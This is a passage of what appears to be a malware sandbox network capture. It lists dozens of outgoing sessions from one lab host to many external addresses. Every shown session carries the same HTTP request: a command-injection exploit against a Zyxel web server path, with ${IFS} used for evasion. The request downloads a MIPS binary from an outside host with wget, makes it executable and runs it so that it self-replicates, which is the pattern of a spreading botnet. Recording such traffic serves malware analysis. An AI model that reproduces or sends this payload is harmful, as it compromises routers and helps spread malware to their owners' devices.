                                                  Jan 19, 2024 18:23:45.845233917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1969192.168.2.1350474206.16.57.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845278025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1970192.168.2.1358594148.91.134.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845319033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1971192.168.2.1340398195.96.44.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845370054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1972192.168.2.1333838146.210.43.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845396996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1973192.168.2.135140658.162.12.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845438004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1974192.168.2.134888841.95.149.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845464945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1975192.168.2.1350952113.80.37.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845499039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1976192.168.2.1345622139.242.224.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845535040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1977192.168.2.1346112168.221.148.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845571041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1978192.168.2.135747274.125.109.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845613956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1979192.168.2.1337362203.224.126.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845629930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1980192.168.2.1336830128.42.221.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845685959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1981192.168.2.134123041.207.23.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845736980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1982192.168.2.133309287.106.121.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845773935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1983192.168.2.134669063.100.196.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845815897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1984192.168.2.1349344131.65.36.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845873117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1985192.168.2.1356526222.215.233.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845912933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1986192.168.2.134115862.165.74.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845938921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1987192.168.2.133609898.121.104.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.845980883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1988192.168.2.1336924167.13.92.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846024036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1989192.168.2.136060050.186.238.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846069098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1990192.168.2.1358486138.109.11.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846107960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1991192.168.2.1343402111.127.233.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846139908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1992192.168.2.1354408180.193.38.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846180916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1993192.168.2.134994443.174.172.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846215010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1994192.168.2.134285488.150.207.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846249104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1995192.168.2.1337014173.113.11.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846297979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1996192.168.2.1360554134.46.72.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846333027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1997192.168.2.1343642174.156.119.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846398115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1998192.168.2.135756674.195.127.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846435070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1999192.168.2.1358654143.191.210.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846482992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2000192.168.2.1351250149.68.247.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846502066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2001192.168.2.135694859.56.163.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846549034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2002192.168.2.13504005.225.118.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846580982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2003192.168.2.135249425.31.121.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846627951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2004192.168.2.1340644108.116.155.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846653938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2005192.168.2.1337474203.202.121.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846707106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2006192.168.2.133309648.203.222.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846730947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2007192.168.2.1339320216.252.90.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846757889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2008192.168.2.13361268.170.228.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846822977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2009192.168.2.135317039.248.229.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846878052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2010192.168.2.1340388220.171.211.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846915960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2011192.168.2.1356264128.170.241.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.846952915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2012192.168.2.134438879.173.208.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847001076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2013192.168.2.1350440213.226.102.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847029924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2014192.168.2.1351228124.179.31.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847075939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2015192.168.2.1354856176.96.22.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847106934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2016192.168.2.1338148189.152.217.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847171068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2017192.168.2.133586046.131.241.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847197056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2018192.168.2.1351230208.116.121.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847256899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2019192.168.2.1356052180.164.22.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847296953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2020192.168.2.134328843.23.223.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847337008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2021192.168.2.1357718117.165.152.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847368002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2022192.168.2.1345506137.226.98.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847424030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2023192.168.2.133467472.149.98.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847465992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2024192.168.2.133538068.214.158.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847515106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2025192.168.2.134087282.114.119.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847541094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2026192.168.2.134844297.199.129.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847558975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2027192.168.2.133645875.168.138.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847616911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2028192.168.2.1349182113.64.38.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847651005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2029192.168.2.135364676.204.48.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847687006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2030192.168.2.1343440124.229.78.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.847734928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2031192.168.2.135501060.20.251.205443
                                                  TimestampBytes transferredDirectionData
